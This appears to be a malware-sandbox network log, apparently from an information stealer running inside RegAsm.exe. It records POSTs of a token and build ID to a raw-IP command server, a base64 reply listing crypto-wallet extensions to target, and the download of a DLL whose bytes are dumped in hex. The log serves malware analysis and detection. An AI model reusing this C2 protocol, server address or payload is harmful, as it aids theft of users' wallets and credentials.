                                                                                                                                                                                                                                                            Server: HTTP server (unknown)
                                                                                                                                                                                                                                                            Content-Length: 3183
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 55 69 6e 4b 38 5f 44 6a 66
                                                                                                                                                                                                                                                            Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="UinK8_Djf
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC1029INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                                                                                                                                                                            Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.2.44974395.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:04 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------BAECFHJEBAAFIEBGHIIECont
                                                                                                                                                                                                                                                            2024-04-29 20:13:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:05 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:05 UTC5533INData Raw: 31 35 39 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                            Data Ascii: 1590TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.2.44974895.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:06 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 6269
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:06 UTC6269OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EHIIIJDAAAAAAKECBFBACont
                                                                                                                                                                                                                                                            2024-04-29 20:13:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:07 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.2.44975095.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:08 UTC242OUTGET /sqlx.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:08 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:08 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 2459136
                                                                                                                                                                                                                                                            Last-Modified: Sun, 28 Apr 2024 22:07:42 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "662ec8ae-258600"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:08 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                                            2024-04-29 20:13:08 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                            Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                                            2024-04-29 20:13:08 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                                            Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                                            2024-04-29 20:13:08 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                                            Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                                            2024-04-29 20:13:09 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                                            Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                                            2024-04-29 20:13:09 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                            Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                                            2024-04-29 20:13:09 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                            Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                                            2024-04-29 20:13:09 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                                            Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                                            2024-04-29 20:13:09 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                                            Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                                            2024-04-29 20:13:09 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                                            Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.2.44975323.6.204.109443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:10 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                            2024-04-29 20:13:10 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                            Server: ECAcc (chd/0790)
                                                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                            X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=39049
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:10 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
